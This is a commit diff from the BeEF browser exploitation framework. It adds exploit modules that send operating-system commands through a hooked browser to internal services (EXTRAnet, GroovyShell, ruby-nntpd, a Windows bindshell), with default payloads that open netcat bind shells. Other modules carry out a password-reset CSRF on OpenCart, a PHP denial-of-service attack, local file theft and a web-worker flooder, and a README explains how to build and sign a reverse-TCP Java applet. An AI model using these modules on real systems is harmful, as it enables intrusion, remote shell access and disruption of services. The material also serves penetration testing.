// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
// validate target details
if (!rport || !rhost || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
return;
}
if (rport > 65535 || rport < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
return;
}
// send commands
var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
// clean up
cleanup = function() {
document.body.removeChild(extract_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

16
modules/exploits/extract_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
extract_cmd_exec:
enable: true
category: "Exploits"
name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["IE"]

30
modules/exploits/extract_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
###
# EXTRAnet Collaboration Tool (extra-ct)
# Version: 0.5.1
# Homepage: http://www.extra-ct.net/
# Source: http://code.google.com/p/extra-ct/
# Source: http://sourceforge.net/projects/extract/
###
class Extract_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end

43
modules/exploits/groovyshell_server_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
// validate target details
if (!rport || !rhost || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
return;
}
if (rport > 65535 || rport < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
return;
}
// send commands
var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
// clean up
cleanup = function() {
document.body.removeChild(groovy_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

16
modules/exploits/groovyshell_server_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
groovyshell_server_command_execution:
enable: true
category: "Exploits"
name: "GroovyShell Server Command Execution"
description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["IE"]

22
modules/exploits/groovyshell_server_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Groovyshell_server_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end

BIN
modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
View File

Binary file not shown.

BIN
modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
View File

Binary file not shown.

BIN
modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar Normal file
View File

Binary file not shown.

50
modules/exploits/local_host/java_payload/README.txt Normal file
View File

@@ -0,0 +1,50 @@
--- How to use this module ---
The following is how you compile the JavaPayload handlers :
$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
$cd .. && ant compile && ant jar
$cd build/bin
$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
At this point you have the applet ready to go, with a reverseTCP handler:
Applet_ReverseTCP.jar
Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
with Java 6 to run it on those versions too - SUGGESTED :-).
At this stage you need to sign the applet.
The following is to create a self-signed certificate and then sign it.
Obviously if you have a valid code signing certificate, even better ;)
keytool -keystore tmp -genkey
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
Now launch the BeEF module.
If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
! help
help: show information about commands.
Usage: help [command]
Supported commands:
help - show this help
info - list system properties
pwd - show current directory
cd - change directory
ls - list directory
exec - execute native command
cat - show text file
wget - download file
telnet - create TCP connection
paste - create text file
jobs - list or continue jobs
exit - Exit JSh
When inside an interactive command, enter ~. on a new
line to exit from that command. Enter ~& to background the command.
Enter ~~ to start a line with a ~ character

1
modules/exploits/local_host/java_payload/config.yaml
View File

@@ -12,5 +12,4 @@ beef:
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported." description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
authors: ["antisnatchor"] authors: ["antisnatchor"]
target: target:
not_working: ["FF"]
user_notify: ["All"] user_notify: ["All"]

2
modules/exploits/local_host/java_payload/module.rb
View File

@@ -6,7 +6,7 @@
class Java_payload < BeEF::Core::Command class Java_payload < BeEF::Core::Command
def pre_send def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
end end
def self.options def self.options

24
modules/exploits/opencart_reset_password/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var base = '<%= @base %>';
var password = '<%= @password %>';
var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
{'type':'hidden', 'name':'password', 'value':password},
{'type':'hidden', 'name':'confirm', 'value':password}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(opencart_reset_password_iframe);
}
setTimeout("cleanup()", 15000);
});

15
modules/exploits/opencart_reset_password/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
opencart_reset_password:
enable: true
category: "Exploits"
name: "Opencart Reset Password CSRF"
description: "Attempts to reset an Opencart user's password."
authors: ["Saadat Ullah", "bcoles"]
target:
unknown: ["ALL"]

20
modules/exploits/opencart_reset_password/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# This module has not been tested
class Opencart_reset_password < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

8
modules/exploits/php-5.3.9-dos/command.js
View File

@@ -32,7 +32,7 @@ function serializeObj (obj) {
} }
// Run attack // Run attack
function attackSite (target_url) { function php_dos (target_url) {
var bad = serializeObj(createEvilObj()); var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
xhr.open("POST", target_url, true); xhr.open("POST", target_url, true);
@@ -42,10 +42,10 @@ function attackSite (target_url) {
} }
try { try {
attackSite("<%= @url %>"); php_dos("<%= @url %>");
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent"); beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
} catch (e) { } catch (e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString()); beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
} }
}); });

3
modules/exploits/php-5.3.9-dos/module.rb
View File

@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
def post_execute def post_execute
content = {} content = {}
content['result'] = @datastore['result'] content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail] = @datastore['fail'] if not @datastore['fail'].nil?
save content save content
end end

4
modules/exploits/qnx_qconn_command_execution/command.js
View File

@@ -30,12 +30,12 @@ beef.execute(function() {
} }
// send commands // send commands
var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload); var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
// clean up // clean up
cleanup = function() { cleanup = function() {
document.body.removeChild(qnx_iframe); document.body.removeChild(qnx_iframe_<%= @command_id %>);
} }
setTimeout("cleanup()", timeout*1000); setTimeout("cleanup()", timeout*1000);

43
modules/exploits/ruby_nntpd_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
// validate target details
if (!rport || !rhost || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
return;
}
if (rport > 65535 || rport < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
return;
}
// send commands
var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
// clean up
cleanup = function() {
document.body.removeChild(nntpd_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

16
modules/exploits/ruby_nntpd_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
ruby_nntpd_cmd_exec:
enable: true
category: "Exploits"
name: "ruby-nntpd Command Execution"
description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["IE"]

24
modules/exploits/ruby_nntpd_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
###
class Ruby_nntpd_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '1119'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end

4
modules/ipec/inter_protocol_irc/command.js
View File

@@ -25,12 +25,12 @@ beef.execute(function() {
irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n"; irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";
// send commands // send commands
var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands); var irc_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
// clean up // clean up
cleanup = function() { cleanup = function() {
document.body.removeChild(irc_iframe); document.body.removeChild(irc_iframe_<%= @command_id %>);
} }
setTimeout("cleanup()", 15000); setTimeout("cleanup()", 15000);

91
modules/ipec/inter_protocol_win_bindshell/command.js
View File

@@ -6,74 +6,41 @@
beef.execute(function() { beef.execute(function() {
var target_ip = "<%= @ip %>"; // validate payload
var target_port = "<%= @port %>"; try {
var cmd = "<%= @cmd %>"; var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var timeout = "<%= @command_timeout %>"; } catch(e) {
var internal_counter = 0; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
var parent = window.location.href;
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
myform.appendChild(myExt);
myform.submit();
} }
function waituntilok() { // validate target host
var rhost = "<%= @rhost %>";
try { if (!rhost) {
if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; return;
output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
document.body.removeChild(iframe);
return;
} else throw("command results haven't been returned yet");
} catch (e) {
internal_counter++;
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
document.body.removeChild(iframe);
return;
}
setTimeout(function() {waituntilok()},1000);
}
} }
if (!target_port || !target_ip || isNaN(target_port)) { // validate target port
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port'); var rport = "<%= @rport %>";
} else if (target_port > 65535 || target_port < 0) { if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
} else { return;
do_submit(target_ip, target_port, cmd);
waituntilok();
} }
// validate timeout
var timeout = "<%= @timeout %>";
if (isNaN(timeout)) timeout = 30;
// send commands
var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
// clean up
cleanup = function() {
document.body.removeChild(win_ipec_form_<%= @command_id %>);
}
setTimeout("cleanup()", timeout * 1000);
}); });

86
modules/ipec/inter_protocol_win_bindshell/command.old.js Normal file
View File

@@ -0,0 +1,86 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// This is the old module which supports bi-directional communications for Firefox before version ~16
beef.execute(function() {
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
var cmd = "<%= @cmd %>";
var timeout = "<%= @command_timeout %>";
var internal_counter = 0;
cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
var parent = window.location.href;
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
myform.appendChild(myExt);
myform.submit();
}
function waituntilok() {
try {
if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
document.body.removeChild(iframe);
return;
} else throw("command results haven't been returned yet");
} catch (e) {
internal_counter++;
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
document.body.removeChild(iframe);
return;
}
setTimeout(function() {waituntilok()},1000);
}
}
// validate target host
if (!target_ip) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
return;
}
// validate target port
if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
return;
}
// send commands
do_submit(target_ip, target_port, cmd);
waituntilok();
});

6
modules/ipec/inter_protocol_win_bindshell/config.yaml
View File

@@ -9,8 +9,8 @@ beef:
enable: true enable: true
category: "IPEC" category: "IPEC"
name: "Bindshell (Windows)" name: "Bindshell (Windows)"
description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
authors: ["bcoles", "wade"] authors: ["bcoles", "wade"]
target: target:
working: ["FF"] working: ["FF", "C"]
not_working: ["C", "S", "O", "IE"] not_working: ["S", "O", "IE"]

57
modules/ipec/inter_protocol_win_bindshell/module.rb
View File

@@ -4,67 +4,28 @@
# See the file 'doc/COPYING' for copying permission # See the file 'doc/COPYING' for copying permission
# #
=begin =begin
[+] Summary: The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
The command results are returned to the BeEF control panel.
[+] Tested:
o Working:
o Mozilla Firefox 4
o Mozilla Firefox 5
o Not Working:
o Mozilla Firefox 5 with the NoScript extension
o Internet Explorer 8+
o Chrome 13
o Opera 11
o Safari 5
[+] Notes:
o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
SYSTEM rule:
Site LOCAL
Accept from LOCAL
Deny
o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
=end =end
class Inter_protocol_win_bindshell < BeEF::Core::Command class Inter_protocol_win_bindshell < BeEF::Core::Command
def self.options def self.options
return [ return [
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'},
{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } {'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
] ]
end end
def post_execute def post_execute
content = {} content = {}
content['result'] = @datastore['result'] if not @datastore['result'].nil? content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
if content.empty?
content['fail'] = 'No data was returned.'
end
save content save content
end end
end end

8
modules/misc/local_file_theft/command.js
View File

@@ -219,9 +219,9 @@ result = '';
function grabFiles(dir,os){ function grabFiles(dir,os){
tmpfile = {} tmpfile = {}
for (i in fileList[os]['post']){ for (i in fileList[os]['post']){
console.log('dir = ' + dir); beef.debug('dir = ' + dir);
console.log('fileList: ' + fileList[os]['post'][i]); beef.debug('fileList: ' + fileList[os]['post'][i]);
console.log(i); beef.debug(i);
tmpfile[i] = new XMLHttpRequest() tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send(); tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
tmpfile[i].onreadystatechange=function(){ tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){ for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){ if(tmpfile[j].readyState==4){
console.log('new returned for: ' + j); beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText; result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);

33
modules/network/DOSer/command.js Normal file
View File

@@ -0,0 +1,33 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var url = '<%= @url %>';
var delay = '<%= @delay %>';
var method = '<%= @method %>';
var post_data = '<%= @post_data %>';
if(!!window.Worker){
var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
myWorker.onmessage = function (oEvent) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
};
var data = {};
data['url'] = url;
data['delay'] = delay;
data['method'] = method;
data['post_data'] = post_data;
myWorker.postMessage(data);
}else{
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
}
});

15
modules/network/DOSer/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
